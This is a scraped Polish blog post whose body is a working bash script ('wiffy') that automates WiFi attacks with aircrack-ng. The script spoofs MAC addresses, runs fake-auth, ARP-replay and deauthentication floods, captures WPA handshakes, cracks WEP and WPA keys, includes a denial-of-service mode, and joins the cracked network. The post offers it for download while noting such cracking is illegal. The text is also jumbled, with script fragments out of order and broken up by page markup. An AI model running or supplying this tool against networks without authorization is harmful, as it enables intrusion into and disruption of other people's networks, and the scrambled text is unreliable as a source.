cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0007.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; 